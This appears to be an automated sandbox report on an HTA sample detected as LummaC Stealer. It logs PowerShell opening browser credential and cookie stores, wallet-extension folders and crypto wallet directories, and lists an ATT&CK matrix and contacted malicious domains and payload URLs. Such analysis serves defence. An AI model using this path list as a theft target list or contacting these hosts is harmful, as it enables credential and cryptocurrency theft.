Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	12 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	111 Process Injection	3 Obfuscated Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	2 Software Packing	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	221 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	221 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Winter.mp4.hta	3%	Virustotal		Browse
Winter.mp4.hta	0%	ReversingLabs

Source	Detection	Scanner	Label
https://cdn1.klipbazyxui.shop	0%	Avira URL Cloud	safe
https://cegu.shop/	100%	Avira URL Cloud	malware
https://klipvumisui.shop/int_clp_sha.txts=Rc	100%	Avira URL Cloud	malware
https://dfgh.online/invoker.php?compName=	0%	Avira URL Cloud	safe
https://crackerdolk.click/api-	0%	Avira URL Cloud	safe
http://crl.microsoftkC0	0%	Avira URL Cloud	safe
https://crackerdolk.click/api	0%	Avira URL Cloud	safe
https://crackerdolk.click/r	0%	Avira URL Cloud	safe
https://crackerdolk.click/	0%	Avira URL Cloud	safe
https://cdn1.klipbazyxui.shop/vankok.vstx	0%	Avira URL Cloud	safe
https://klipvumisui.shop/int_clp_sha.txtZR	100%	Avira URL Cloud	malware
https://cegu.shop/8574262446/ph.txt	100%	Avira URL Cloud	malware
https://crackerdolk.click/i	0%	Avira URL Cloud	safe
https://klipvumisui.shop/int_clp_sha.txt	100%	Avira URL Cloud	malware
https://crackerdolk.click/apiH	0%	Avira URL Cloud	safe
https://crackerdolk.click/wn	0%	Avira URL Cloud	safe
crackerdolk.click	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
crackerdolk.click	104.21.80.1	true	true	unknown
cdn1.klipbazyxui.shop	104.21.72.190	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
https://crackerdolk.click/api	true	Avira URL Cloud: safe	unknown
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://cdn1.klipbazyxui.shop/vankok.vstx	true	Avira URL Cloud: safe	unknown
prisonyfork.buzz	false		high
https://cegu.shop/8574262446/ph.txt	false	Avira URL Cloud: malware	unknown
hummskitnj.buzz	false		high
crackerdolk.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
